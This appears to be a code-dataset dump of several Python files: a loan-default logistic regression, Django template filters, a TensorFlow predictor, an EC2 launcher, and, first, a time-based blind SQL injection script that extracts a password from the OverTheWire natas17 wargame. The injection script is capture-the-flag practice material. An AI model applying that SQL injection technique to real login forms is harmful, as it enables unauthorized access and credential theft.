id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
1660908 | import requests
import string
import time
BASIC_AUTH_USER = 'natas17'
BASIC_AUTH_PASSWORD = '<PASSWORD>'
def generate_characters_dictionary():
alpha_numeric_string = string.ascii_letters + string.digits
dictionary = []
for single_character in alpha_numeric_string:
username_like = 'natas18" and password LIKE BINARY \'%' + single_character + '%\' and sleep(1) #"'
payload = {'username': username_like}
start_request = time.time()
requests.post('http://natas17.natas.labs.overthewire.org/', auth=(BASIC_AUTH_USER, BASIC_AUTH_PASSWORD), data=payload)
end_request = time.time()
time_difference = end_request - start_request
if time_difference >= 1:
dictionary.append(single_character)
return dictionary
def find_password():
dictionary = generate_characters_dictionary()
print(dictionary)
password_found = False
password = ''
while password_found is False:
for single_character in dictionary:
new_password = <PASSWORD>
username_like = 'natas18" and password LIKE BINARY \'' + new_password + '%\' and sleep(1) #"'
payload = {'username': username_like}
start_request = time.time()
requests.post('http://natas17.natas.labs.overthewire.org/', auth=(BASIC_AUTH_USER, BASIC_AUTH_PASSWORD), data=payload)
end_request = time.time()
time_difference = end_request - start_request
if time_difference >= 1:
password = <PASSWORD>
print('Password so far: ', password)
# all previous password were 32 in length
if len(password) == 32:
password_found = True
break
print('Password: ', password)
find_password() | StarcoderdataPython |
1787914 | """Class mixins."""
from __future__ import annotations
import logging
from contextlib import suppress
from typing import TYPE_CHECKING, cast
if TYPE_CHECKING:
from runway._logging import RunwayLogger
LOGGER = cast("RunwayLogger", logging.getLogger(f"runway.{__name__}"))
class DelCachedPropMixin:
"""Mixin to handle safely clearing the value of :func:`functools.cached_property`."""
def _del_cached_property(self, *names: str) -> None:
"""Delete the cached value of a :func:`functools.cached_property`.
Args:
names: Names of the attribute that is cached. Can provide one or multiple.
"""
for name in names:
with suppress(AttributeError):
delattr(self, name)
| StarcoderdataPython |
63977 | from __future__ import unicode_literals
from django.db import models
# Create your models here.
class feedback_data(models.Model):
improvements=models.CharField(max_length=500)
complain=models.CharField(max_length=500)
| StarcoderdataPython |
159090 | import numpy as np
import pandas as pd
import itertools
import matplotlib.pyplot as plt
from sklearn.model_selection import cross_val_predict,cross_val_score,train_test_split
from sklearn.metrics import classification_report,confusion_matrix,roc_curve,auc,precision_recall_curve,roc_curve
import pickle
#raw_df = pd.read_csv("/home/terrence/CODING/Python/MODELS/Credit_Union_PDs/default_data.csv", encoding="latin-1")
myfile = "/home/terrence/CODING/Python/MODELS/Credit_Union_PDs/Test Variables READY.xlsx"
raw_df = pd.read_excel(myfile, sheet_name = 'Data', header = 0)
print(raw_df.shape)
#raw_df.dropna(inplace = True)
#print(raw_df.shape)
#print(raw_df.columns.values)
'''
[u'Loan Number' u'Loan Type Description' u'Balance' u'Loan Term' u'Interest Rate' u'Origination Date' u'Origination Month'
u'Most Recent Credit Score' u'AmountFunded' u'MonthlyIncomeBaseSalary' u'TotalMonthlyIncome' u'MonthlyIncomeOther'
u'Collateral Current Valuation' u'LTV' u'Number of Days Delinquent' u'Days Late T or F' u'Balance.1' u'Days 11-15 Delinquent'
u'Days 16-20 Delinquent' u'Days 21-29 Delinquent' u'Days 30-44 Delinquent' u'Days 45-59 Delinquent' u'Days 60-179 Delinquent'
u'Days 180-359 Days Delinquent' u'Days 360+ Delinquent' u'Days Delinquent T or F' u'Grade Overall' u'Original Loan Amount'
u'Current Credit Limit' u'Maturity Date' u'Maturity Month' u'Original Credit Score' u'LTV-Original' u'Probability of Default'
u'Branch' u'Loan Officer' u'Underwriter' u'Loan Type Code' u'Loan Category' u'Auto Dealer' u'Primary Customer City' u'Status'
u'Updated Credit Score' u'Original Interest Rate' u'LTV (Effective)' u'LTV-Original (Effective)' u'LTV-Original Total Commitments'
u'LTV-Total Commitments' u'LTV-Total Commitments (Effective)' u'LTV-Total Commitments-Original (Effective)'
u'Grade by Most Recent Credit Score' u'Grade by Cerdit Score (ORIGINAL)' u'GRADE BY CREDIT SCORE (UPDATED)' u'JointTotalMonthlyIncome'
u'JointProfessionMonths' u'JointCity' u'JointApplicantType' u'JointMonthlyIncomeBaseSalary' u'JointMonthlyIncomeOther'
u'JointMonthlyIncomeOtherDescription1' u'JointOccupation' u'IndCity' u'IndMonthlyIncomeBaseSalary' u'IndMonthlyIncomeOther'
u'IndTotalMonthlyIncome' u'IndMonthlyIncomeOtherDescription1' u'PaymentAmount' u'PaymentFrequency' u'Insurance' u'DueDay1' u'DueDay2'
u'PaymentMethodText' u'SymitarPurposeCode' u'ApprovedLTV' u'FundedLTV' u'PaymentToIncome' u'NumberOfOpenRevolvingAccounts' u'AmountApproved'
u'AmountFunded.1' u'AmountOwedToLender' u'DOB' u'DOB.1' u'DOB.2' u'AGE' u'AGE of BORROWER' u'JointDOB' u'Year' u'Year.1' u'AGE OF JOINT'
u'AGE OF JOINT.1' u'IndDOB' u'YEAR' u'YEAR.1' u'AGE.1' u'AGE of IND' u'AllButThisDebtToIncomeFund' u'AllButThisDebtToIncomeUW'
u'EstimatedMonthlyPayment' u'TotalDebtToIncomeFund' u'TotalDebtToIncomeUW' u'TotalUnsecureBalance' u'TotalExistingLoanAmount' u'APR'
u'IsHighRiskConsumerLoan' u'IsAdvanceRequest' u'IsWorkoutLoan' u'LoanPaymentFrequency' u'PaymentType' u'Rate']
'''
raw_df['label'] = raw_df['Number of Days Delinquent'].map(lambda x : 1 if int(x) > 11 else 0)
print(raw_df.shape)
#print(raw_df['Loan Type Description'].mean())
print(np.any(np.isnan(raw_df['Loan Type Description'])))
#print(raw_df['Balance'].mean())
print(np.any(np.isnan(raw_df['Balance'])))
#print(raw_df['Loan Term'].mean())
print(np.any(np.isnan(raw_df['Loan Term'])))
#print(raw_df['LTV'].mean())
print(np.any(np.isnan(raw_df['LTV'])))
#print(raw_df['label'].sum())
print(np.any(np.isnan(raw_df['label'])))
print("\n\n")
#print(raw_df['Interest Rate'].mean())
print(np.any(np.isnan(raw_df['Interest Rate'])))
#print(raw_df['Origination Month'].mean())
print(np.any(np.isnan(raw_df['Origination Month'])))
#print(raw_df['Most Recent Credit Score'].mean())
print(np.any(np.isnan(raw_df['Most Recent Credit Score'])))
#print(raw_df['AmountFunded'].mean())
raw_df['AmountFunded'] = raw_df['AmountFunded'].fillna(raw_df['AmountFunded'].mean())
print(np.any(np.isnan(raw_df['AmountFunded'])))
#print(raw_df['MonthlyIncomeBaseSalary'].mean())
raw_df['MonthlyIncomeBaseSalary'] = raw_df['MonthlyIncomeBaseSalary'].fillna(raw_df['MonthlyIncomeBaseSalary'].mean())
print(np.any(np.isnan(raw_df['MonthlyIncomeBaseSalary'])))
#print(raw_df['TotalMonthlyIncome'].mean())
raw_df['TotalMonthlyIncome'] = raw_df['TotalMonthlyIncome'].fillna(raw_df['TotalMonthlyIncome'].mean())
print(np.any(np.isnan(raw_df['TotalMonthlyIncome'])))
#print(raw_df['MonthlyIncomeOther'].mean())
raw_df['MonthlyIncomeOther'] = raw_df['MonthlyIncomeOther'].fillna(raw_df['MonthlyIncomeOther'].mean())
print(np.any(np.isnan(raw_df['MonthlyIncomeOther'])))
#print(raw_df['Collateral Current Valuation'].mean())
print(np.any(np.isnan(raw_df['Collateral Current Valuation'])))
print("\n\n")
#raw_df['Balance'] = raw_df['Balance'].fillna(-99999)
print(np.any(np.isnan(raw_df['Balance'])))
#raw_df['Grade Overall'] = raw_df['Grade Overall'].fillna(-99999)
print(np.any(np.isnan(raw_df['Grade Overall'])))
#raw_df['Current Credit Limit'] = raw_df['Current Credit Limit'].fillna(-99999)
print(np.any(np.isnan(raw_df['Current Credit Limit'])))
#raw_df['Loan Type Code'] = raw_df['Loan Type Code'].fillna(-99999)
print(np.any(np.isnan(raw_df['Loan Type Code'])))
#raw_df['Status'] = raw_df['Status'].fillna(-99999)
print(np.any(np.isnan(raw_df['Status'])))
raw_df['Insurance'] = raw_df['Insurance'].fillna(raw_df['Insurance'].mean())
print(np.any(np.isnan(raw_df['Insurance'])))
raw_df['NumberOfOpenRevolvingAccounts'] = raw_df['NumberOfOpenRevolvingAccounts'].fillna(raw_df['NumberOfOpenRevolvingAccounts'].mean())
print(np.any(np.isnan(raw_df['NumberOfOpenRevolvingAccounts'])))
raw_df['APR'] = raw_df['APR'].fillna(raw_df['APR'].mean())
print(np.any(np.isnan(raw_df['APR'])))
#raw_df['PaymentToIncome'] = raw_df['PaymentToIncome'].fillna(raw_df['PaymentToIncome'].mean())
#print(np.any(np.isnan(raw_df['PaymentToIncome'])))
raw_df['AmountOwedToLender'] = raw_df['AmountOwedToLender'].fillna(raw_df['AmountOwedToLender'].mean())
print(np.any(np.isnan(raw_df['AmountOwedToLender'])))
#raw_df['AGE of BORROWER'] = raw_df['AGE of BORROWER'].fillna(raw_df['AGE of BORROWER'].mean())
#print(np.any(np.isnan(raw_df['AGE of BORROWER'])))
raw_df['LoanPaymentFrequency'] = raw_df['LoanPaymentFrequency'].fillna(raw_df['LoanPaymentFrequency'].mean())
print(np.any(np.isnan(raw_df['LoanPaymentFrequency'])))
raw_df['Rate'] = raw_df['Rate'].fillna(raw_df['Rate'].mean())
print(np.any(np.isnan(raw_df['Rate'])))
#df1 = pd.concat([raw_df['Loan Type Description'], raw_df['Balance'], raw_df['Loan Term'],raw_df['LTV'], raw_df['label']],axis =1)
df1 = raw_df[['Loan Type Description','Balance','Loan Term','Interest Rate','Origination Month','Most Recent Credit Score',
'AmountFunded','MonthlyIncomeBaseSalary', 'TotalMonthlyIncome','MonthlyIncomeOther','Collateral Current Valuation','LTV',
'Balance','Grade Overall','Current Credit Limit','Loan Type Code','Loan Category','Status','Updated Credit Score',
'Original Interest Rate','Grade by Cerdit Score (ORIGINAL)','GRADE BY CREDIT SCORE (UPDATED)','Insurance',
'NumberOfOpenRevolvingAccounts','AmountOwedToLender','APR','LoanPaymentFrequency','Rate','label']]
print(df1.shape)
print(df1.head(4))
#df1 = df1.reset_index()
print(np.any(np.isnan(df1)))
print(np.all(np.isfinite(df1)))
y_CU = raw_df['Probability of Default']
y = df1.label
X = df1.drop("label", axis =1)
print(X.shape)
RANDOM_SEED = 42
LABELS = ["non-delinguent", "delinguent"]
print(df1.shape)
print(df1.isnull().values.any())
print(df1.head(3))
fig11 = plt.figure()
count_classes = pd.value_counts(df1['label'], sort = True)
count_classes.plot(kind = 'bar', rot=0)
plt.title("delinguency distribution")
plt.xticks(range(2), LABELS)
plt.xlabel("Class")
plt.ylabel("Frequency")
plt.show()
fig11.savefig("Class distribution.pdf")
#fig11.savefig("Class distribution.png")
print(df1['label'].value_counts())
#from sklearn.cross_validation import train_test_split
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, auc, roc_curve
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
from imblearn.over_sampling import SMOTE
os = SMOTE(random_state=0)
#X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)
columns = X_train.columns
os_data_X,os_data_y=os.fit_sample(X_train, y_train)
os_data_X = pd.DataFrame(data=os_data_X,columns=columns )
os_data_y= pd.DataFrame(data=os_data_y,columns=['y'])
# we can Check the numbers of our data
print("length of X data is ",len(X))
print("length of oversampled data is ",len(os_data_X))
print("Number of no delinguent in oversampled data",len(os_data_y[os_data_y['y']==0]))
print("Number of delinguent",len(os_data_y[os_data_y['y']==1]))
print("Proportion of no delinguent data in oversampled data is ",len(os_data_y[os_data_y['y']==0])/len(os_data_X))
print("Proportion of delinguent data in oversampled data is ",len(os_data_y[os_data_y['y']==1])/len(os_data_X))
X_train = os_data_X
y_train = os_data_y
from sklearn.linear_model import LogisticRegression
fig12 = plt.figure(figsize=(15,8))
ax1 = fig12.add_subplot(1,2,1)
ax1.set_xlim([-0.05,1.05])
ax1.set_ylim([-0.05,1.05])
ax1.set_xlabel('Recall')
ax1.set_ylabel('Precision')
ax1.set_title('PR Curve')
ax2 = fig12.add_subplot(1,2,2)
ax2.set_xlim([-0.05,1.05])
ax2.set_ylim([-0.05,1.05])
ax2.set_xlabel('False Positive Rate')
ax2.set_ylabel('True Positive Rate')
ax2.set_title('ROC Curve')
for w,k in zip([1,5,10,20,50,100,10000],'bgrcmykw'):
lr_model = LogisticRegression(class_weight={0:1,1:w})
lr_model.fit(X_train,y_train)
#lr_model.fit(os_data_X,os_data_y)
pred_prob = lr_model.predict_proba(X_test)[:,1]
p,r,_ = precision_recall_curve(y_test,pred_prob)
tpr,fpr,_ = roc_curve(y_test,pred_prob)
ax1.plot(r,p,c=k,label=w)
ax2.plot(tpr,fpr,c=k,label=w)
ax1.legend(loc='lower left')
ax2.legend(loc='lower left')
plt.show()
fig12.savefig("log_reg_weights.pdf")
#fig12.savefig("log_reg_weights.png")
#lr = LogisticRegression(class_weight='balanced')
#lr = LogisticRegression(class_weight={0:1,1:28})
lr = LogisticRegression()
lr = lr.fit(X_train, y_train)
params = np.append(lr.intercept_,lr.coef_)
#params = np.append(lr.coef_)
#print(params)
var1 = np.append("Intercept",X.columns)
print(var1)
#coeff1 = pd.DataFrame({'Variable':var1,'Coeffient':params})
coeff1 = pd.DataFrame({'Coeffient':params, 'Variable':var1})
print(coeff1.shape)
print(coeff1.head(16))
coeff1.to_csv("Model_Coefficients.csv")
lr_predicted = lr.predict(X_test)
confusion = confusion_matrix(y_test, lr_predicted)
print(lr.score(X_test,y_test))
print("Number of mislabeled points out of a total %d points : %d" % (X_test.shape[0],(y_test != lr_predicted).sum()))
print("\n\n")
print(confusion)
y_pred = lr.predict(X_test)
acc = accuracy_score(y_test,y_pred)
prec = precision_score(y_test,y_pred)
rec = recall_score(y_test,y_pred)
f1 = f1_score(y_test, y_pred)
fpr, tpr, thresholds = roc_curve(y_test, y_pred)
auc1 = auc(fpr,tpr)
print("\n\n")
print("Number of mislabeled points out of a total %d points : %d" % (X_test.shape[0],(y_test != y_pred).sum()))
print("\n\n")
print("Logistic accuracy:" ,acc)
print("Logistic precision:" ,prec)
print("Logistic recall:" ,rec)
print("Logistic f1 ratio:" ,f1)
print("Logistic AUC:" ,auc1)
#y_proba_lr = lr.fit(X_train, y_train).predict_proba(X_test)
y_proba_lr = lr.fit(X_train, y_train).predict_proba(X)
print(y_proba_lr[:,1])
from sklearn.model_selection import cross_val_score
# accuracy is the default scoring metric
print('Cross-validation (accuracy)', cross_val_score(lr, X_train, y_train, cv=5))
scores_acc = cross_val_score(lr, X_train, y_train, cv=5)
print("Accuracy: %0.2f (+/- %0.2f)" % (scores_acc.mean(), scores_acc.std() * 2))
# use AUC as scoring metric
print('Cross-validation (AUC)', cross_val_score(lr, X_train, y_train, cv=5, scoring = 'roc_auc'))
scores_auc = cross_val_score(lr, X_train, y_train, cv=5, scoring = 'roc_auc')
print("AUC: %0.2f (+/- %0.2f)" % (scores_auc.mean(), scores_auc.std() * 2))
# use recall as scoring metric
print('Cross-validation (recall)', cross_val_score(lr, X_train, y_train, cv=5, scoring = 'recall'))
scores_rec = cross_val_score(lr, X_train, y_train, cv=5, scoring = 'recall')
print("Recall: %0.2f (+/- %0.2f)" % (scores_rec.mean(), scores_rec.std() * 2))
print('Cross-validation (precision)', cross_val_score(lr, X_train, y_train, cv=5, scoring = 'precision'))
scores_prec = cross_val_score(lr, X_train, y_train, cv=5, scoring = 'precision')
print("precision: %0.2f (+/- %0.2f)" % (scores_prec.mean(), scores_prec.std() * 2))
import seaborn as sns
#cm = pd.crosstab(y_test, y_pred, rownames = 'True', colnames = 'predicted', margins = False)
cm = confusion_matrix(y_test, lr_predicted)
ax= plt.subplot()
sns.heatmap(cm, annot=True, ax = ax); #annot=True to annotate cells
# labels, title and ticks
ax.set_xlabel('Predicted labels');ax.set_ylabel('True labels');
ax.set_title('Confusion Matrix');
ax.xaxis.set_ticklabels(['non-delinguent', 'delinguent']); ax.yaxis.set_ticklabels(['non-delinguent', 'delinguent'])
plt.show()
#ax.savefig("confusion_matrix.pdf")
#ax.savefig("confusion_matrix.png")
y_scores_lr = lr.decision_function(X_test)
# ### Precision-recall curves
from sklearn.metrics import precision_recall_curve
precision, recall, thresholds = precision_recall_curve(y_test, y_scores_lr)
closest_zero = np.argmin(np.abs(thresholds))
closest_zero_p = precision[closest_zero]
closest_zero_r = recall[closest_zero]
plt.figure()
plt.xlim([0.0, 1.01])
plt.ylim([0.0, 1.01])
plt.plot(precision, recall, label='Precision-Recall Curve')
plt.plot(closest_zero_p, closest_zero_r, 'o', markersize = 12, fillstyle = 'none', c='r', mew=3)
plt.xlabel('Precision', fontsize=16)
plt.ylabel('Recall', fontsize=16)
plt.axes().set_aspect('equal')
plt.show()
fpr_lr, tpr_lr, _ = roc_curve(y_test, y_scores_lr)
roc_auc_lr = auc(fpr_lr, tpr_lr)
fig13 = plt.figure()
plt.xlim([-0.01, 1.00])
plt.ylim([-0.01, 1.01])
plt.plot(fpr_lr, tpr_lr, lw=3, label='Logistic Reg ROC curve (area = {:0.2f})'.format(roc_auc_lr))
plt.xlabel('False Positive Rate', fontsize=16)
plt.ylabel('True Positive Rate', fontsize=16)
plt.title('ROC curve (delinguency classifier)', fontsize=16)
plt.legend(loc='lower right', fontsize=13)
plt.plot([0, 1], [0, 1], color='navy', lw=3, linestyle='--')
plt.axes().set_aspect('equal')
plt.show()
fig13.savefig("ROC_curve_1.pdf")
#fig1.savefig("ROC_curve_1.png")
print(y_proba_lr[:,1])
err = y_CU - y_proba_lr[:,1]
rmse_err = np.sqrt(np.mean(err**2))
print(rmse_err)
prob = y_proba_lr[:,1]
prob2 = pd.DataFrame({'probability':prob})
print(prob2.shape)
print(prob2.head(6))
prob2.to_csv("predicted_probability.csv")
save_classifier = open("log_reg_Credit_Union_PDS_model.pickle", "wb")
pickle.dump(lr, save_classifier)
#cPickle.dump(model, save_classifier)
##dill.dump(model, save_classifier)
save_classifier.close()
print("hoora!")
#classifier_f = open("log_reg_Credit_Union_PDS_model.pickle","rb")
#model = pickle.load(classifier_f)
#classifier_f.close()
#https://scikit-learn.org/stable/auto_examples/model_selection/plot_roc.html#sphx-glr-auto-examples-model-selection-plot-roc-py
#https://towardsdatascience.com/building-a-logistic-regression-in-python-step-by-step-becd4d56c9c8
#https://github.com/susanli2016/Machine-Learning-with-Python/blob/master/Logistic%20Regression%20balanced.ipynb
y_score = lr.decision_function(X_test)
# Compute ROC curve and ROC area for each class
fpr, tpr, _ = roc_curve(y_test, y_score)
roc_auc = auc(fpr, tpr)
fig14 =plt.figure()
lw = 2
plt.plot(fpr, tpr, color='darkorange',
lw=lw, label='ROC curve (area = %0.2f)' % roc_auc)
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver operating characteristic (ROC) curve')
plt.legend(loc="lower right")
plt.show()
fig14.savefig("ROC_curve_2.pdf")
#fig.savefig("ROC_curve_2.png")
#++++++++++++++++++++++++++++++++++++++++ LGD +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Load modules and data
import statsmodels.api as sm
# Instantiate a gamma family model with the default link function.
gamma_model = sm.GLM(y_train, X_train, family=sm.families.Gamma())
gamma_results = gamma_model.fit()
print(gamma_results.summary())
| StarcoderdataPython |
1678265 | import os
from django import template
from django.shortcuts import reverse
from django.utils.html import format_html, escape
from django.utils.http import urlencode
import html2text
from project.models import AccessPolicy
from notification.utility import mailto_url
register = template.Library()
@register.filter(name='html_to_text')
def html_to_text(html):
"""
Convert HTML to plain text.
"""
parser = html2text.HTML2Text()
parser.ignore_links = True
parser.ignore_emphasis = True
return parser.handle(html).replace('\n', '')
@register.filter(name='nbsp')
def nbsp(text):
"""
Replace spaces in the input text with non-breaking spaces.
"""
return str(text).replace(' ', '\N{NO-BREAK SPACE}')
@register.filter(name='resource_badge')
def resource_badge(resource_type):
badges = {
0: '<span class="badge badge-dark"><i class="fa fa-database"></i> Database</span>',
1: '<span class="badge badge-dark"><i class="fa fa-code"></i> Software</span>',
2: '<span class="badge badge-dark"><i class="fa fa-bullseye"></i> Challenge</span>',
3: '<span class="badge badge-dark"><i class="fa fa-project-diagram"></i> Model</span>',
}
return badges[resource_type]
@register.filter(name='topic_badge')
def topic_badge(topic, show_count=False):
url = (reverse('content_index')
+ '?' + urlencode({'topic': topic.description}))
if show_count:
badge = '<a href="{}"><span class="badge badge-pn">{} ({})</span></a>'.format(
url, topic.description, topic.project_count)
else:
badge = '<a href="{}"><span class="badge badge-pn">{}</span></a>'.format(
url, topic.description)
return badge
@register.filter(name='delimit')
def delimit(items):
"""
Delimit the iterable of strings
"""
return '; '.join(i for i in items)
@register.filter(name='access_badge')
def access_badge(access_policy):
badges = {
AccessPolicy.OPEN: '<span class="badge badge-success"><i class="fas fa-lock-open"></i> Open Access</span>',
AccessPolicy.RESTRICTED: (
'<span class="badge badge-warning"><i class="fas fa-unlock-alt"></i> Restricted Access</span>'
),
AccessPolicy.CREDENTIALED: (
'<span class="badge badge-danger"><i class="fas fa-lock"></i> Credentialed Access</span>'
),
AccessPolicy.CONTRIBUTOR_REVIEW: (
'<span class="badge badge-danger"><i class="fas fa-lock"></i> Contributor Review</span>'
),
}
try:
return badges[access_policy]
except KeyError:
return format_html('<!-- unknown access_policy: {} -->', access_policy)
@register.filter(name='access_description')
def access_description(access_policy):
descriptions = {
AccessPolicy.OPEN: (
'Anyone can access the files, as long as they conform to the terms of the specified license.'
),
AccessPolicy.RESTRICTED: (
'Only logged in users who sign the specified data use agreement can access the files.'
),
AccessPolicy.CREDENTIALED: ('Only credentialed users who sign the specified DUA can access the files.'),
AccessPolicy.CONTRIBUTOR_REVIEW: (
'In addition to the requirements for Credentialed projects, '
'users must have individual studies reviewed by you as the contributor. This is an extremely '
'burdensome access mode and we do not recommend its use.'
),
}
try:
return descriptions[access_policy]
except KeyError:
return format_html('<!-- unknown access_policy: {} -->', access_policy)
@register.filter(name='bytes_to_gb')
def bytes_to_gb(n_bytes):
"""
Convert storage allowance bytes to a readable gb value
"""
if n_bytes < 1073741824:
return '{:.2f}'.format(n_bytes / 1073741824)
else:
return '{:d}'.format(int(n_bytes / 1073741824))
@register.filter(name='submission_result_label')
def submission_result_label(submission):
"""
Shows a word label for the result of a submission given its status
"""
if submission.status == 5:
result = 'Accepted and published'
elif submission.status == 1:
result == 'Rejected'
else:
result = 'Ongoing'
return result
def author_popover(author, show_submitting=False, show_email=False,
show_corresponding=False):
"""
Helper function for the popover of show_author_info and
show_all_author_info
"""
affiliation_info = escape('<b>Affiliations</b><p>{}</p>'.format('<br>'.join(escape(a) for a in author.text_affiliations)))
profile_info = '<p><b>Profile</b><br><a href=/users/{} target=_blank>{}</a></p>'.format(author.username, author.username)
popover_body = ''.join((affiliation_info, profile_info))
if show_submitting and author.is_submitting:
popover_body = '<p><strong>Submitting Author</strong></p>' + popover_body
if show_email:
popover_body += '<p><strong>User Email</strong><br> {}</p>'.format(author.email)
if show_corresponding and author.is_corresponding:
popover_body += '<p><strong>Corresponding Email</strong><br> {}</p>'.format(author.corresponding_email)
return '<a class="author">{}</a> <i class="fas fa-info-circle" data-toggle="popover" data-original-title="<strong>Author Info</strong>" data-placement="bottom" data-content="{}" data-html="true" style="cursor: pointer;"></i>'.format(
author.name, popover_body)
@register.filter(name='show_author_info')
def show_author_info(author):
"""
Display the author's name, and a popover icon with their
affiliation and profile info, for public view.
Requires set_display_info method to be called by author beforehand.
"""
return author_popover(author)
@register.filter(name='show_all_author_info')
def show_all_author_info(author):
"""
Display information about the author, for the editor panel.
Requires set_display_info method to be called by author beforehand.
"""
return author_popover(author, show_submitting=True, show_email=True,
show_corresponding=True)
@register.simple_tag(name='mailto_link')
def mailto_link(*recipients, **params):
"""
Format an email address as an HTML link.
The recipient address(es) are specified as positional arguments.
Additional header fields (such as 'subject') and the special
pseudo-header 'body' may be specified as keyword arguments.
For example, {% mailto_link "<EMAIL>" %}
yields "<a href="mailto:<EMAIL>"><EMAIL></a>".
"""
url = mailto_url(*recipients, **params)
label = ', '.join(recipients)
return format_html('<a href="{0}">{1}</a>', url, label)
@register.filter
def filename(value):
return os.path.basename(value.name)
| StarcoderdataPython |
3285840 | <reponame>monokrome/tensorflow<filename>tensorflow/contrib/predictor/saved_model_predictor.py
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A `Predictor` constructed from a `SavedModel`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
from tensorflow.contrib.predictor import predictor
from tensorflow.contrib.saved_model.python.saved_model import signature_def_utils
from tensorflow.python.client import session
from tensorflow.python.framework import ops
from tensorflow.python.saved_model import loader
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.tools import saved_model_cli
DEFAULT_TAGS = 'serve'
_DEFAULT_INPUT_ALTERNATIVE_FORMAT = 'default_input_alternative:{}'
def _get_signature_def(signature_def_key, export_dir, tags):
"""Construct a `SignatureDef` proto."""
signature_def_key = (
signature_def_key or
signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY)
metagraph_def = saved_model_cli.get_meta_graph_def(export_dir, tags)
try:
signature_def = signature_def_utils.get_signature_def_by_key(
metagraph_def,
signature_def_key)
except ValueError as e:
try:
formatted_key = _DEFAULT_INPUT_ALTERNATIVE_FORMAT.format(
signature_def_key)
signature_def = signature_def_utils.get_signature_def_by_key(
metagraph_def, formatted_key)
logging.warning('Could not find signature def "%s". '
'Using "%s" instead', signature_def_key, formatted_key)
except ValueError:
raise ValueError(
'Got signature_def_key "{}". Available signatures are {}. '
'Original error:\n{}'.format(
signature_def_key, list(metagraph_def.signature_def), e))
return signature_def
def _check_signature_arguments(signature_def_key,
signature_def,
input_names,
output_names):
"""Validates signature arguments for `SavedModelPredictor`."""
signature_def_key_specified = signature_def_key is not None
signature_def_specified = signature_def is not None
input_names_specified = input_names is not None
output_names_specified = output_names is not None
if input_names_specified != output_names_specified:
raise ValueError(
'input_names and output_names must both be specified or both be '
'unspecified.'
)
if (signature_def_key_specified + signature_def_specified +
input_names_specified > 1):
raise ValueError(
'You must specify at most one of signature_def_key OR signature_def OR'
'(input_names AND output_names).'
)
class SavedModelPredictor(predictor.Predictor):
"""A `Predictor` constructed from a `SavedModel`."""
def __init__(self,
export_dir,
signature_def_key=None,
signature_def=None,
input_names=None,
output_names=None,
tags=None,
graph=None):
"""Initialize a `CoreEstimatorPredictor`.
Args:
export_dir: a path to a directory containing a `SavedModel`.
signature_def_key: Optional string specifying the signature to use. If
`None`, then `DEFAULT_SERVING_SIGNATURE_DEF_KEY` is used. Only one of
`signature_def_key` and `signature_def` should be specified.
signature_def: A `SignatureDef` proto specifying the inputs and outputs
for prediction. Only one of `signature_def_key` and `signature_def`
should be specified.
input_names: A dictionary mapping strings to `Tensor`s in the `SavedModel`
that represent the input. The keys can be any string of the user's
choosing.
output_names: A dictionary mapping strings to `Tensor`s in the
`SavedModel` that represent the output. The keys can be any string of
the user's choosing.
tags: Optional. Tags that will be used to retrieve the correct
`SignatureDef`. Defaults to `DEFAULT_TAGS`.
graph: Optional. The Tensorflow `graph` in which prediction should be
done.
Raises:
ValueError: If more than one of signature_def_key OR signature_def OR
(input_names AND output_names) is specified.
"""
_check_signature_arguments(
signature_def_key, signature_def, input_names, output_names)
tags = tags or DEFAULT_TAGS
self._graph = graph or ops.Graph()
with self._graph.as_default():
self._session = session.Session()
loader.load(self._session, tags.split(','), export_dir)
if input_names is None:
if signature_def is None:
signature_def = _get_signature_def(signature_def_key, export_dir, tags)
input_names = {k: v.name for k, v in signature_def.inputs.items()}
output_names = {k: v.name for k, v in signature_def.outputs.items()}
self._feed_tensors = {k: self._graph.get_tensor_by_name(v)
for k, v in input_names.items()}
self._fetch_tensors = {k: self._graph.get_tensor_by_name(v)
for k, v in output_names.items()}
| StarcoderdataPython |
140719 | <reponame>lvsl-deactivated/go-to
#!/usr/bin/env python
'''
Start new ec2 instance with open ssh port
'''
__author__ = "<NAME>, <<EMAIL>>"
import json
import os
import sys
import time
from datetime import datetime
import boto
import boto.ec2
# based on http://cloud-images.ubuntu.com/releases/precise/release/
INSTANCE_CONFIG = {
"ami": "ami-14907e63", # Ubuntu 12.04.3 LTS eu-west-1 64-bit instance
"region": "eu-west-1",
"type": "m1.small",
}
def main(config_path, name_prefix, tag):
with open(config_path) as f:
config = json.load(f)
ec2 = boto.ec2.connect_to_region(
INSTANCE_CONFIG['region'],
aws_access_key_id=config['access_key_id'],
aws_secret_access_key=config['secret_access_key'])
name = name_prefix + "-" + datetime.utcnow().isoformat()
# Assume that ssh key is uploaded
group = ec2.create_security_group(
name,
'A group that allows SSH access')
group.authorize('tcp', 22, 22, "0.0.0.0/0")
reservation = ec2.run_instances(
INSTANCE_CONFIG['ami'],
key_name=os.path.basename(config['certificate_path']).split(".")[0],
instance_type=INSTANCE_CONFIG['type'],
security_groups=[name])
# Find the actual Instance object inside the Reservation object
# returned by EC2.
instance = reservation.instances[0]
# The instance has been launched but it's not yet up and
# running. Let's wait for it's state to change to 'running'.
print 'waiting for instance'
while instance.state != 'running':
print '.',
time.sleep(1)
instance.update()
print 'done'
instance.add_tag(tag)
print "DoNe! To connect use:"
print "ssh -i {} ubuntu@{}".format(
config['certificate_path'],
instance.public_dns_name
)
if __name__ == "__main__":
if len(sys.argv) != 4:
